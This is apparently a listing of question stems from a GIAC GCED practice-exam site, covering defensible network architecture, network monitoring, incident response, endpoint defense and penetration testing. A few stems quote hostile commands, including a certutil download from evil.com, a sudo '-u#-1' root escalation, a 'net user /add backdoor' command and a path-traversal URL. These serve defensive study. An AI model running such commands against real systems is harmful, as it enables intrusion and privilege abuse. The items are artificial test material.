GIAC Certified Enterprise Defender practice questions
GIAC · GCED · 300 questions
Original practice questions for GIAC Certified Enterprise Defender.
This course contains the use of artificial intelligence.
Practice Quizzes
Test your knowledge with standard 20-question practice sets.
Quiz 1
Quiz 2
Quiz 3
Quiz 4
Quiz 5
Quiz 6
Quiz 7
Quiz 8
Quiz 9
Quiz 10
Quiz 11
Quiz 12
Quiz 13
Quiz 14
Quiz 15
Browse by Domain
Study specific topics at your own pace.
Domain 1: Defensible Network Architecture · 50 questions
- Your organization is redesigning its network architecture after a breach that allowed lateral movement from the guest Wi-Fi network to internal servers. Which design principle most directly addresses this failure?
- A security architect is designing a DMZ for a web application that must communicate with a backend database. Which firewall rule set best represents defensible architecture?
- During a network architecture review, you find that all VLANs can communicate with each other through a core switch with no inter-VLAN ACLs. The organization has PCI-scoped systems in VLAN 10 and user workstations in VLAN 20. What is the MOST critical remediation?
- An organization wants to allow remote employees to access internal resources. The security team must choose between a split-tunnel VPN and a full-tunnel VPN. Which statement BEST describes the security trade-off?
- A hospital network has medical devices running legacy operating systems that cannot be patched. Which network architecture control BEST reduces the risk these devices pose?
- An organization uses 802.1X for network access control. An attacker attempts to connect an unauthorized laptop to a wired port. Which 802.1X behavior BEST prevents unauthorized access?
- A security engineer is configuring egress filtering on the corporate firewall. Which approach BEST represents a defensible egress policy?
- During an architecture review, you discover the organization has no out-of-band management network for network devices. Why is an out-of-band management network considered a key element of defensible architecture?
- An organization wants to enforce network access controls based on the health posture of connecting endpoints. Which technology BEST enables this capability?
- A network architect is designing a new branch office. The branch hosts a public-facing web application, an internal HR portal, and manufacturing control systems (OT). Which segmentation model best reduces lateral movement risk if any one segment is compromised?
- A firewall admin reviews a ruleset and finds: Rule 1 ALLOW any → 10.0.0.50:443, Rule 2 DENY 192.168.10.0/24 → any, Rule 3 ALLOW 192.168.10.5 → 10.0.0.50:443. Which statement is accurate about Rule 3?
- Your organization must allow vendor remote access to an OT environment for maintenance windows. Which architecture best balances operational need with security?
- An analyst discovers that internal workstations can initiate connections to any external IP on port 80 and 443 without restriction. Which control would most improve the defensibility of this architecture?
- A defense-in-depth review reveals the perimeter firewall is the only control between the internet and a critical database server. Which additional architectural layer provides the most immediate risk reduction?
- During a network architecture review, a team finds that two business units share the same VLAN and IP subnet. A compromise of a workstation in Unit A led to credential harvesting across Unit B via SMB relay. Which architectural remedy directly addresses this threat?
- A company's cloud-hosted workloads in AWS communicate with on-premises systems via a VPN tunnel. Security requirements mandate that cloud workloads must not have direct paths to the on-premises OT segment. Which control enforces this?
- A new DMZ web server needs to communicate with an internal database server on port 1433 (MSSQL). The security team must allow this while maintaining least-privilege firewall rules. Which rule set is most appropriate?
- A network architect is designing a new enterprise segment and wants to enforce the principle of least privilege at the network layer. Which approach best achieves this goal?
- An organization wants to implement network access control (NAC) to ensure only compliant endpoints connect to the production VLAN. Which 802.1X component authenticates the endpoint device?
- A security engineer is designing a DMZ for a public-facing web application. Which firewall rule policy best follows defense-in-depth principles?
- Which concept describes the practice of positioning network taps and security sensors so that no traffic path exists that cannot be monitored?
- A company is designing a new data center network. The security team insists on using out-of-band management for all network devices. What is the primary security benefit?
- An organization deploys network-based encryption between all internal hosts using IPsec in tunnel mode. Which security monitoring challenge does this create?
- A CISO asks the network team to design a network that assumes breach. Which architecture element is most aligned with this philosophy?
- Which protocol should be disabled on network switches to prevent VLAN hopping attacks?
- A network architect is evaluating whether to use a stateful inspection firewall or a next-generation firewall (NGFW) for a new deployment. What capability does an NGFW provide that a traditional stateful firewall lacks?
- A network security architect is tasked with redesigning the enterprise network to reduce the attack surface. Which approach directly reduces the number of exploitable network paths an attacker can take?
- An organization uses an intrusion prevention system (IPS) inline between the internet router and the core firewall. What risk does this introduce if not managed correctly?
- A defensible network architecture principle states that adversaries must traverse known, controlled paths. Which control most directly enforces this for internal lateral movement?
- A security architect is evaluating whether to use a Software-Defined Networking (SDN) approach for network segmentation. What key advantage does SDN provide over traditional VLAN-based segmentation?
- A company wants to ensure that wireless guest networks cannot reach corporate internal resources. Which architectural control achieves this most effectively?
- A network engineer wants to capture full packet data (PCAP) from a high-speed 10Gbps link. Which deployment method is preferred to avoid dropping packets?
- What is the security purpose of deploying a honeypot inside an enterprise network (internal honeypot)?
- An organization wants to detect rogue wireless access points connected to the corporate wired network. Which technique is most effective at identifying unauthorized wireless devices?
- A network architect is implementing a zero-trust architecture. Which statement best describes the core principle of zero trust regarding network location?
- An organization wants to ensure that its egress filtering policy prevents data exfiltration. Which egress filtering strategy is most effective?
- A network security engineer is designing a network where a compromised host in the employee VLAN should not be able to directly communicate with servers in the production VLAN. Which Layer 3 control enforces this?
- A security team wants to collect full-content packet capture at multiple network choke points without impacting production traffic. The preferred method is passive monitoring. Which technology achieves this?
- An organization is designing its network security architecture and the CISO requires separation between the management plane of network devices and the data plane. What does this separation achieve?
- A security team is evaluating network access control solutions. What is the primary limitation of using only MAC address filtering for network access control?
- An organization's security policy requires that all network devices use encrypted management protocols. Which statement correctly distinguishes Telnet from SSH for device management?
- A network architect is documenting the organization's security architecture. What is a 'security zone' in the context of network architecture?
- A network architect must provide reliable internet access for business-critical applications while maintaining security controls. Which topology provides both resilience and inspection of all internet-bound traffic?
- An organization discovers that an attacker was able to exfiltrate data by establishing outbound connections to cloud storage services that were not blocked by the firewall. What specific control gap does this represent?
- A security architect is designing network zones for a new enterprise. Which principle governs how services should be placed across zones to minimize attack surface?
- Which technique does an attacker use to maintain a persistent foothold in a network by registering a domain that closely resembles a legitimate organization's domain (e.g., 'g00gle.com' vs 'google.com')?
- A security engineer is implementing network access control using 802.1X. When a non-compliant device connects, it should be placed in a restricted VLAN allowing only remediation traffic. What is this VLAN called?
- An attacker performs reconnaissance and discovers that the target organization uses a BGP autonomous system number and announces specific IP prefixes to the internet. How could a threat actor attempt to exploit this information?
- A network security architect wants to implement network policy enforcement ensuring that only authorized systems can communicate with production database servers. Which approach provides the strongest guarantee without relying solely on firewall rules?
- A cloud-first organization deploys workloads in AWS and wants to apply network security monitoring equivalent to on-premises NSM. Which AWS service provides VPC-level network traffic visibility for analysis?
Domain 2: Network Security Monitoring · 19 questions
- A Zeek analyst reviews logs and finds repeated DNS queries from an internal host to randomly-generated domain names that all resolve to the same external IP. What attack technique does this MOST likely indicate?
- During PCAP analysis, an analyst observes an internal host sending small, periodic HTTP POST requests to an external IP every 60 seconds. Each request body contains a small amount of base64-encoded data. What does this MOST likely indicate?
- A Suricata IDS rule fires on traffic between two internal hosts. The signature matches a known SMB exploit. The analyst confirms both hosts are fully patched. What should the analyst conclude?
- A security analyst is tuning a Suricata IDS and finds a single rule generating 10,000 alerts per day, all of which are verified legitimate business traffic. What is the BEST approach to reduce alert noise while maintaining detection capability?
- A Zeek conn.log entry shows a connection with a duration over 8 hours, consistent byte counts throughout, and a destination on port 4444. What does this MOST likely indicate?
- During log correlation in a SIEM, an analyst notices: a firewall allows RDP from an external IP, followed 2 minutes later by a Windows Security log showing a successful logon for a service account, followed by execution of PowerShell with encoded commands. What attack phases does this sequence represent?
- A network security analyst identifies a scan pattern where a single external source IP sends TCP SYN packets to sequential destination ports on a single host without ever completing the three-way handshake. What type of scan is this?
- An analyst reviewing Zeek DNS logs finds unusually long DNS query names (200+ characters) being sent to an external nameserver for a domain registered two days ago. What technique does this MOST likely indicate?
- A SOC receives an alert that an internal host is communicating with a known malicious IP. The firewall is blocking the traffic. Which ADDITIONAL action should the SOC take?
- An analyst notices that traffic from the corporate network to a newly registered domain spikes every night at 2 AM in 512-byte intervals lasting 30 minutes. Zeek logs show the connection uses port 53. What is the most likely threat and best immediate analytical step?
- A Suricata rule fires on a connection: alert http $HOMENET any -> $EXTERNALNET any (msg:'ET TROJAN Possible Cobalt Strike Beacon'; content:'|00 00 00 00|'; offset:4; depth:4;). The alert shows the source host is the CFO's laptop. What is the correct next analytical step?
- While analyzing Zeek conn.log entries, an analyst observes thousands of short-duration (< 1 second) connections from one internal host to 254 unique internal IPs on port 445. What does this traffic pattern most likely indicate?
- An analyst is building a Suricata detection rule for a known exploit that sends a specific 8-byte magic value at offset 0 in a TCP payload on port 9001. Which rule syntax correctly captures this?
- A security analyst receives a PCAP file and is asked to determine if data exfiltration occurred over HTTPS to a known-bad IP. SSL/TLS inspection is not available. Which technique provides the most useful intelligence without decrypting the traffic?
- A Zeek http.log entry shows: method=POST, uri=/gate.php, host=update-cdn12.net, requestbodylen=48320, statuscode=200. The domain was registered 3 days ago. What is the most significant indicator of compromise in this log entry?
- An analyst reviews firewall logs and notices that a web server in the DMZ initiated an outbound connection to an external IP on port 4444. The DMZ firewall policy only allows inbound connections to the web server. What does this event most likely indicate, and what log source should be examined next?
- Your organization uses Zeek for NSM. An analyst notices that the files.log shows a PE executable (application/x-dosexec) was downloaded over HTTP from an internal file server to 30 workstations within 5 minutes. What is the most important immediate action?
- An analyst captures a Zeek DNS log entry showing extremely long subdomain labels: '6f626a65637476616c7565.aabbccdd1122.exfil-domain.com'. What does this indicate and what is the recommended analytical step?
- A security architect is evaluating whether to deploy a Network Detection and Response (NDR) solution or expand SIEM capabilities for east-west traffic monitoring in a data center. Which capability uniquely favors the NDR approach?
Domain 3: Incident Handling & Response · 18 questions
- During the identification phase of the PICERL incident response cycle, a security analyst receives an alert for unusual login activity. What is the PRIMARY objective of this phase?
- A ransomware attack has encrypted files on 15 servers. The IR team needs to contain the incident. Which containment action should be performed FIRST?
- During a forensic investigation, an analyst must collect evidence from a running compromised Windows server. In what order should volatile data be collected following the order of volatility?
- An incident responder discovers an attacker established persistence via a scheduled task that downloads and executes a payload from an external server at startup. What is the CORRECT sequence of eradication steps?
- After containing an incident involving compromised administrative credentials, the IR team is in the recovery phase. Which action is MOST critical before returning affected systems to production?
- A forensic analyst investigating a compromised Linux system finds the command history file has been cleared. Which alternative source BEST helps reconstruct attacker command activity?
- An IR team is responding to a business email compromise where an attacker used a compromised executive's email account. During post-incident activity, which lesson-learned item is MOST valuable?
- During incident response, the team discovers the attacker used only built-in Windows tools including certutil, bitsadmin, and mshta. Why does this complicate traditional IR approaches?
- An organization has confirmed a data breach involving customer PII. The IR team lead is determining notification requirements. Which factor MOST directly affects breach notification timelines?
- During an incident response engagement, the IR team is called at 11 PM after a ransomware alert fires on a file server. The server is actively encrypting shares. What is the correct sequence of initial containment actions?
- An IR analyst is performing triage on a potentially compromised Linux web server. Which command sequence collects volatile artifacts in the correct order of volatility?
- During the eradication phase of an incident involving a compromised Active Directory environment, the team identifies that the attacker created a Golden Ticket using a stolen KRBTGT hash. Which eradication action is specifically required to invalidate all existing Golden Tickets?
- A company's IR policy states that all incidents must be categorized before escalation. An analyst receives a ticket: 'User reports laptop running slowly.' During triage, the analyst finds outbound connections to a known C2 IP and a persistent registry run key for an unknown binary. How should this incident be categorized?
- During post-incident recovery, the IR team is determining when to bring a compromised e-commerce system back online. Which condition must be satisfied before production restoration?
- An IR team is performing forensic disk acquisition of a Windows workstation suspected of data exfiltration. Which tool and method represent best practice for forensic imaging?
- An incident involves a phishing campaign that delivered a malicious macro-enabled document. After containment, the IR team must identify all affected users. Which data source most efficiently identifies who opened the document?
- An incident response team discovers that an attacker has been present in the network for 6 months. The attacker used a valid domain administrator account. Which forensic artifact is most useful for establishing a timeline of the attacker's activities within Active Directory?
- A company's written IR policy requires notifying the legal team before taking containment actions on any system. During an active ransomware outbreak, the IR team is containment-ready but the legal team is unreachable for 2 hours. What should the IR team do?
Domain 4: Continuous Security Monitoring · 18 questions
- A SIEM analyst needs to establish a behavioral baseline for normal SSH login activity. Which metric combination is MOST useful for effective anomaly detection?
- A continuous security monitoring program receives threat intelligence indicating an APT group is actively exploiting a zero-day in VPN concentrators. The intelligence includes IOCs such as specific IP addresses and file hashes. What is the MOST effective immediate use of this intelligence?
- An organization's SIEM generates 500,000 events per day. The security team wants to prioritize which alerts to investigate first. Which framework BEST guides alert prioritization?
- An organization wants to implement a threat hunting program. Which data source combination provides the MOST value for hunting advanced persistent threats that evade signature-based detection?
- A security team is implementing continuous monitoring and must choose between agent-based and agentless endpoint data collection. Which statement accurately describes the trade-off?
- A SIEM correlation rule fires when more than 10 failed authentication attempts are followed by a successful authentication within 5 minutes from the same source IP. An alert fires for a service account. What should the analyst investigate FIRST?
- An organization's vulnerability management team takes an average of 45 days to remediate critical vulnerabilities. Which metric BEST measures the effectiveness of the remediation program?
- A continuous security monitoring analyst notices a critical server has not reported logs to the SIEM for 72 hours. What is the MOST appropriate response?
- An organization is implementing a SIEM platform. Which log source combination should be prioritized for initial ingestion to maximize threat detection capability?
- A SOC analyst receives an alert from the SIEM: 'User account jsmith logged in from two geographically disparate locations within 10 minutes (New York and Tokyo).' What is the first analytical step to determine if this is a true positive?
- A SIEM correlation rule fires: 'More than 5 failed login attempts followed by a successful login from the same source IP within 2 minutes.' Which attack technique does this rule detect, and what additional context should be collected?
- Your organization subscribes to a commercial threat intelligence feed that provides malicious IP addresses. A new analyst proposes blocking all IPs from the feed at the perimeter firewall immediately. What risk does this approach carry?
- A SIEM analyst notices that Windows Event ID 4624 (successful logon) with Logon Type 3 (network logon) is generated thousands of times per hour on file servers from service accounts. How should the analyst tune the SIEM to reduce alert noise without losing security value?
- An analyst receives a threat intelligence report describing a new APT group using a specific YARA signature pattern in their custom implant. The organization has a SIEM with endpoint telemetry. Which action most effectively operationalizes this intelligence?
- A security operations team wants to establish a baseline for 'normal' DNS query rates per workstation to detect DNS tunneling. Which statistical approach is most appropriate for anomaly detection?
- A SIEM rule generates: 'Privileged group membership change: user svcbackup added to Domain Admins.' No change request ticket exists for this change. What is the correct response workflow?
- A threat hunter is looking for evidence of living-off-the-land (LOtL) techniques on Windows endpoints. Which combination of data sources provides the best hunting surface?
- A threat intelligence analyst receives a report from an ISAC (Information Sharing and Analysis Center) containing a list of IP addresses, domains, and file hashes associated with a threat actor targeting the energy sector. How should this intelligence be prioritized for operationalization?
Domain 5: Endpoint Defense · 13 questions
- A Windows endpoint begins executing PowerShell commands that download a second-stage payload, spawn a new process, and inject code into a legitimate svchost.exe process. Which EDR capability is MOST critical for detecting this fileless attack chain?
- A hardening team is configuring a Windows server to minimize attack surface against credential theft. Which combination of settings BEST reduces exposure?
- An organization implements application whitelisting on endpoints. Users report that legitimate business applications are being blocked. What is the MOST effective approach to managing exceptions while maintaining security?
- A security engineer finds that 30% of workstations have not received critical OS patches after 60 days. The patches address an RCE vulnerability actively exploited in the wild. What is the BEST immediate remediation approach?
- An attacker bypasses endpoint antivirus using a signed Microsoft Office macro to download a PowerShell payload that runs entirely in memory. Which endpoint defense capability MOST effectively detects this attack?
- A security team discovers employees are using personal USB drives to transfer files to and from corporate laptops in violation of policy. Which endpoint control BEST technically enforces the USB restriction?
- An organization wants to enforce secure configurations consistently across 5,000 endpoints. Which approach MOST effectively ensures consistent hardening at scale?
- A Windows endpoint protection team wants to prevent macro execution in Microsoft Office documents delivered via email. Which combination of controls provides defense in depth for this threat?
- An EDR console shows a process tree: winword.exe → cmd.exe → powershell.exe -enc [base64 string] → net.exe user /add backdoor P@ssw0rd. Which MITRE ATT&CK techniques are represented, and what immediate action should be taken?
- An organization wants to implement application whitelisting on workstations to prevent unauthorized software execution. A user complains that a legitimate business tool installed in their user profile (C:\Users\jdoe\AppData\Local\) is being blocked. What is the correct whitelisting policy adjustment?
- A patch management audit reveals that 15% of Windows workstations have not received the most recent security patches in 90 days. The primary reason is that these machines are used for 24/7 operations and cannot be rebooted. Which approach best balances security and operational continuity?
- A security engineer is hardening a Windows Server 2022 system. Which CIS Benchmark recommendation has the highest impact on reducing the attack surface for a web server role?
- An EDR alert shows a legitimate antivirus process (avgnt.exe) loading an unsigned DLL from C:\Temp\msdetour.dll. What attack technique does this most likely represent?
Domain 6: Penetration Testing & Vulnerability Assessment · 38 questions
- A penetration tester performing an internal network assessment needs to identify live hosts on the 10.0.0.0/8 network while minimizing IDS detection. Which scanning approach is MOST appropriate?
- A vulnerability assessment identifies a critical CVE with CVSS 9.8 on a web server. The finding notes the vulnerability is not exploitable because a compensating firewall rule blocks access to the affected service. How should the vulnerability management team handle this?
- A penetration test finds a web application reflecting user input directly into HTTP response headers without sanitization. Which vulnerability class does this represent and what is the primary risk?
- During a penetration test, a tester has a low-privileged Windows account. Which technique would MOST likely allow privilege escalation to SYSTEM?
- A penetration testing team is preparing the final report. Which element is MOST important to differentiate for executive leadership versus technical staff?
- A security team is selecting between authenticated and unauthenticated vulnerability scans for a quarterly assessment of internal servers. Which scenario BEST justifies using an authenticated scan?
- A penetration tester gains valid domain user credentials through a phishing simulation and then performs a Kerberoasting attack. What does Kerberoasting retrieve and how is it exploited?
- A penetration tester is performing an external network assessment and conducts passive reconnaissance using Shodan. What type of information does Shodan provide?
- A penetration tester exploits a vulnerability and gains an unprivileged shell on a Linux server. The next step is privilege escalation. Which technique involves exploiting a SUID binary with an unintended capability?
- A vulnerability scanner reports a critical finding on a web server: 'Apache HTTP Server 2.4.49 Path Traversal and Remote Code Execution (CVE-2021-41773).' The server is in production. What is the risk-prioritization factor that should be considered first?
- A penetration test report includes a finding of 'SMB signing not required' on domain workstations. Why is this a security risk?
- A penetration tester is conducting a red team engagement and wants to move laterally using 'Living off the Land' (LotL) techniques. Which tool is most consistent with a LotL approach?
- A rules of engagement (ROE) document for a penetration test specifies a 'black-box' testing approach. What does this mean for the penetration tester?
- A vulnerability assessment finds that 200 hosts have a critical-severity vulnerability and 50 hosts have a medium-severity vulnerability that is actively exploited in the wild. How should patching be prioritized?
- A penetration tester is performing post-exploitation on a Windows system and wants to dump credentials from LSASS. The target system has Credential Guard enabled. What is the expected result?
- A penetration tester performs a Kerberoasting attack against an Active Directory domain. What does this attack target and what is the success condition?
- A vulnerability assessment identifies a web server running with directory listing enabled. A directory listing at '/backup/' reveals database dump files. What is the severity and impact of this finding?
- A red team uses the technique of 'living off the land' and runs certutil.exe -urlcache -split -f http://evil.com/payload.exe payload.exe. What is this command doing and why is it significant?
- A security team conducts a vulnerability scan and receives findings across 1,000 hosts. They want to prioritize remediation using the CVSS base score combined with threat intelligence. Which CVSS 3.1 metric most influences exploitability?
- A penetration tester discovers a Linux system running Sudo version 1.8.x and attempts 'sudo -u#-1 /bin/bash'. What vulnerability does this exploit?
- An organization's helpdesk reports that users are receiving calls from someone claiming to be IT support asking them to reveal their passwords or run remote access tools. What type of attack is this?
- A penetration tester performs a post-exploitation review of a domain-joined Windows workstation and finds the registry key HKLM\SECURITY\Cache populated with encrypted entries. What do these entries represent and why are they security-relevant?
- During a penetration test, a tester uses the tool BloodHound to map an Active Directory environment. What specific risk does BloodHound expose that is difficult to identify manually?
- A penetration tester has obtained code execution on a web server in the DMZ and wants to pivot to the internal network. The web server can only reach internal hosts on TCP port 3389. Which technique allows the tester to pivot through this connection?
- A penetration test report rates a finding as CVSS 3.1 score 9.8 (Critical). The security team discovers the vulnerable service is only accessible from a specific isolated test VLAN with no internet access and no connection to production systems. How does this environmental context affect risk?
- A penetration tester is testing a web application for Cross-Site Request Forgery (CSRF) vulnerabilities. What condition must exist for a CSRF attack to be possible?
- A penetration tester submits a test report recommending remediation for a high-severity finding. The client's development team says the fix will take 6 months to implement. What should the client implement in the meantime?
- A penetration tester wants to establish a Command and Control channel that blends with normal corporate traffic and is unlikely to be blocked by enterprise security controls. Which C2 channel is hardest to detect and block while appearing legitimate?
- A security team receives a penetration test report recommending 'removal of unnecessary services and applications.' On a Windows Server 2019 server, which method enforces this recommendation while minimizing the installed attack surface?
- A penetration tester exploits an authenticated Server-Side Request Forgery (SSRF) vulnerability in a cloud application. The tester successfully queries the AWS Instance Metadata Service at 169.254.169.254. What is the security impact?
- A penetration tester successfully exploits a buffer overflow vulnerability in a network service and obtains a root shell. During the debrief, the client asks how they can detect this type of exploitation attempt. Which defensive technology is most effective at detecting exploitation of memory corruption vulnerabilities?
- A penetration tester performs an nmap scan and uses -sV --script=banner flags. What information do these flags collect?
- A penetration tester is assessing an organization's resistance to physical security attacks. They tailgate through a secured door behind an authorized employee without badging in. What type of attack does this represent?
- During a web application penetration test, a tester discovers that the application includes user-supplied input in an HTTP redirect URL parameter without validation: https://app.com/redirect?url=https://victim.com. What vulnerability is present and what is the risk?
- A penetration test report recommends implementing a 'defense-in-depth' strategy as a remediation for multiple findings. A junior analyst asks what this means. Which description is most accurate?
- A penetration tester is assessing a web application and discovers that the application uses the document.write() function with user-controlled input reflected in the response without encoding. What vulnerability is present?
- A penetration tester is conducting a physical assessment and wants to test whether an employee will allow them into a secured area. The tester approaches a door carrying large boxes, making it difficult to badge in, and waits for an employee to open the door. What technique is this?
- After completing a penetration test, the test team must handle the sensitive data and access obtained during testing. Which action is required at the conclusion of the engagement per professional standards?
Domain 6: Penetration Testing · 8 questions
- A penetration tester has been assigned to perform an external network penetration test with a defined scope of 203.0.113.0/28. Before beginning active scanning, what is the most critical pre-engagement step?
- During an nmap scan, a tester runs: nmap -sV -p 1-65535 --open -T4 203.0.113.5. The output shows port 8080/tcp open http Apache Tomcat/9.0.45. What vulnerability should the tester prioritize investigating based on this result?
- A penetration tester discovers a web application with the following URL: https://app.example.com/report?file=../../../etc/passwd. Testing this URL returns the contents of /etc/passwd. Which vulnerability class is this, and what is the appropriate next step in a black-box test?
- After gaining an initial foothold on a Linux system during a penetration test, a tester runs 'id' and receives 'uid=33(www-data)'. The tester wants to escalate to root. Which enumeration step is most likely to reveal a quick privilege escalation path?
- A penetration test report rates a finding as Critical (CVSS 9.8) for an unauthenticated RCE vulnerability in the client's VPN appliance. The client's security manager argues the risk is 'Low' because 'we've never been hacked before.' How should the penetration tester respond?
- During a vulnerability assessment, Nessus identifies a host as vulnerable to MS17-010 (EternalBlue). The rules of engagement for this engagement specify 'vulnerability assessment only — no exploitation.' What is the correct action?
- A network penetration tester successfully performs a man-in-the-middle attack on an internal network using ARP poisoning and captures NTLMv2 hashes. Which technique represents the correct next step to leverage this access?
- A security team wants to validate that their EDR solution would detect a common lateral movement technique (pass-the-hash). Which testing methodology is most appropriate?
Domain 2: Network Security Monitoring (Zeek, Suricata, PCAP, IDS/IPS) · 37 questions
- A Zeek analyst notices that a connection log shows a large number of sessions to a single external IP with very short durations and fixed byte counts. This pattern is most consistent with which type of activity?
- A Suricata rule fires on outbound HTTP traffic containing the string 'cmd.exe' in the URI. The rule uses the http.uri keyword. Which Suricata inspection engine processes this rule?
- An analyst uses Wireshark to capture traffic and applies the filter tcp.flags.syn==1 && tcp.flags.ack==0. What does this filter capture?
- An NSM analyst observes Zeek logs showing a connection where the origbytes is 500 and respbytes is 2,500,000. The destination port is 443. What does this asymmetry suggest?
- A security engineer wants to deploy IDS sensors to detect lateral movement within the enterprise. Where should sensors be placed for maximum effectiveness?
- Which Zeek log file would an analyst examine to identify DNS queries for newly registered or unusual domains associated with C2 infrastructure?
- During PCAP analysis, an analyst notices TCP sessions where the three-way handshake completes but no data is ever transferred before the connection is reset. Large numbers of these are observed across many destination ports. What does this indicate?
- A Suricata alert fires with the message 'ET POLICY Outbound DNS Query for TOR Exit Node.' The alert appears on a workstation used by a financial analyst. What should the analyst do first?
- An IDS signature matches on a specific exploit payload, but the analyst confirms the target system runs a patched OS where the vulnerability does not exist. This alert is classified as:
- A SOC analyst is writing a Suricata rule to detect HTTP POST requests to a specific URI path containing suspicious data. Which rule option correctly targets the normalized HTTP POST body?
- An analyst reviews Zeek ssl.log and notices multiple connections where the subject field of the server certificate is 'CN=localhost' and the issuer matches the subject (self-signed). The connections are outbound to external IPs on port 443. Why is this suspicious?
- An NSM analyst wants to identify hosts that may be participating in a DGA (Domain Generation Algorithm) botnet. Which combination of Zeek log fields most effectively identifies DGA activity?
- A security analyst uses Wireshark and applies the display filter http.request.method == "POST" && http contains "password". What is the security risk this filter is attempting to identify?
- An IDS in a production environment generates an alert for an inbound connection matching an exploit signature for a service that is not running on the target host. After verification, this is classified as a false positive. What tuning action reduces similar false positives for this specific rule?
- Which Zeek log is most useful for identifying file transfers and malware downloads, including file hashes of transferred content?
- A Suricata detection rule uses the keyword flow:established,toserver. What does this specify?
- An analyst examines Zeek's x509.log and finds a certificate with an unusually short validity period of 24 hours issued by 'Let's Encrypt.' The certificate is for a domain registered 2 days ago. Why is this combination suspicious?
- A network security analyst reviews Zeek http.log and notices that a web server is receiving requests where the referrer field is blank but the URI contains deeply nested paths such as '/admin/config/backup/export'. This pattern repeats from multiple external source IPs. What does this suggest?
- An analyst wants to use Zeek to detect SSH brute-force attacks. Which built-in Zeek script and log provide this capability?
- A Zeek analyst notices entries in notice.log with the note type Scan::PortScan pointing to an internal IP address as the scanner. What does this indicate and what is the appropriate investigative action?
- An analyst wants to identify all external DNS resolvers being queried by internal hosts, to detect DNS bypassing the corporate resolver. Which Zeek log and query should be used?
- A Suricata IPS is deployed in inline mode. When a signature matches, what action keyword causes Suricata to drop the matching packet and generate an alert?
- During packet analysis of a suspected C2 channel, an analyst sees HTTP GET requests to 'http://198.51.100.10/update.php?id=AaBbCcDdEeFf1234' repeating every 60 seconds with consistent 256-byte responses. The 'id' parameter changes each iteration. What does this pattern suggest?
- A PCAP analyst examines a file and sees many TCP packets with the PSH and ACK flags set in a consistent pattern with uniform inter-arrival times. Combined with small, fixed-size payloads, what technique might this indicate?
- Which Zeek log file records detected attacks and policy violations generated by Zeek's scripting framework and built-in detectors, separate from specific protocol logs?
- A Suricata rule developer wants to write a rule that detects outbound HTTPS connections where the TLS SNI (Server Name Indication) contains a known malicious domain. Which Suricata keyword targets the TLS SNI field?
- An analyst is analyzing a PCAP file and identifies a TCP stream where large volumes of data are sent from an internal host to an external destination over port 443, but the traffic patterns do not match standard TLS handshake sequences. What should the analyst investigate?
- During network security monitoring, an analyst observes Zeek logs showing an internal host (192.168.1.50) making ICMP requests to 254 different hosts within the 192.168.1.0/24 subnet within 30 seconds. What does this indicate?
- A security team is implementing network security monitoring and must decide where to place IDS/IPS sensors relative to NAT boundaries. What monitoring blind spot does NAT create for an IDS sensor placed outside the NAT boundary?
- An analyst uses Zeek's http.log and notices a request where uri is '/wp-admin/admin-ajax.php' and useragent is 'sqlmap/1.0'. What is the most appropriate immediate action?
- A Suricata analyst wants to write a rule that detects outbound HTTP connections where the Host header contains an IP address instead of a domain name. Why is this significant from a security perspective?
- An NSM analyst is reviewing Zeek logs and sees conn.log entries with connstate of 'S0'. What does this connection state indicate?
- A SOC analyst is reviewing logs and notices that a DNS query for 'abcdefghijklmnopqrstuvwxyz1234567890.malicious-domain.com' returned an A record. Combined with high query frequency, what attack is most likely occurring?
- A network analyst runs Zeek and notices that the tunnel.log shows an IP-in-IP tunnel originating from an internal workstation. Why is this significant from a security perspective?
- A network security monitoring analyst wants to understand what percentage of network sessions are encrypted on the enterprise network. Which Zeek log provides the most direct answer?
- During a network security investigation, an analyst uses the Wireshark filter smtp contains "RCPT TO" to examine email traffic. The analyst finds emails being sent to an external domain with 15 distinct recipients. What should the analyst investigate further?
- An IDS analyst identifies that a Suricata signature is using the fastpattern keyword. What does this keyword do and why is it important?
Domain 3: Incident Handling & Response (PICERL, containment, forensics) · 36 questions
- An analyst is investigating a potential intrusion and needs to determine the timeline of events. Which PICERL phase does this activity fall under?
- During an incident, the security team discovers ransomware actively encrypting files on a file server. The server is critical to business operations. What is the most appropriate immediate containment action?
- A forensic examiner is acquiring a disk image from a compromised workstation. Which tool is most appropriate for creating a forensically sound image while preserving hash integrity?
- An incident responder is analyzing a compromised Linux host and wants to identify all network connections established by a suspicious process. Which command provides this information?
- During incident response, a responder discovers a Windows system where an attacker used Scheduled Tasks for persistence. Which Windows artifact should be examined to recover historical task execution data?
- An incident is declared resolved after eradication and recovery. The PICERL model requires one final phase. What activities occur in this phase?
- A memory forensics analyst runs Volatility against a Windows memory image and uses the netscan plugin. What information does this plugin provide?
- What is the primary purpose of maintaining a chain of custody during a digital forensic investigation?
- An incident responder discovers that an attacker used the Windows 'net use' command to map a remote share before deploying ransomware. Which Windows event ID records this type of network share connection?
- An incident responder follows the PICERL model and is in the Containment phase. The team has isolated an infected workstation but the attacker still has access to a compromised domain admin account. What is the correct next action?
- A forensic examiner needs to analyze the Windows Registry for persistence mechanisms on a compromised system. Which registry key is most commonly used by malware to achieve persistence on user logon?
- During a forensic investigation on a Windows system, an analyst discovers that the attacker ran commands that left no files on disk. Which forensic technique can recover evidence of these commands?
- A security team is performing incident response and wants to understand the full scope of an intrusion. Which concept describes the systematic process of using known compromised systems to identify additional compromised infrastructure?
- An incident response team is deciding whether to perform a 'clean rebuild' versus 'clean in place' remediation for a compromised server. What is the primary advantage of a full rebuild from a known good image?
- An incident responder suspects a Windows system was compromised via a malicious email attachment. Which artifact provides the most direct evidence that an email attachment was opened?
- A SOC team is responding to an incident where an attacker exfiltrated 50GB of data over three weeks. The team's incident response policy requires notifying stakeholders within 24 hours of incident confirmation. When does the 24-hour notification clock typically start?
- A forensic examiner is analyzing a disk image and wants to identify all files that were accessed within a specific time window. Which NTFS metadata field records the last access time?
- During an incident involving a compromised web server, the team discovers a PHP webshell at '/var/www/html/uploads/image.php'. What containment and remediation steps are required?
- During the Identification phase of an incident response, an analyst discovers malware on 5 workstations. The malware uses a common C2 IP address. How should the analyst use this information?
- A Windows forensics investigator wants to determine which USB storage devices have been connected to a system. Which Registry key contains this information?
- An incident response team determines that the root cause of a breach was a phishing email that delivered a malicious document. After remediation, what specific control should be added to the Preparation phase update to prevent recurrence?
- A forensic analyst is examining a Linux system and wants to determine the last commands executed in bash by the root user. Which artifact provides this information?
- During incident response, the team discovers that an attacker used a scheduled task to maintain persistence. After removing the scheduled task, what additional recovery step is necessary to ensure persistence is fully eliminated?
- An incident responder receives a report that a user's workstation is communicating with a known malware C2 IP at regular intervals. Before isolating the workstation, what volatile data should be collected first?
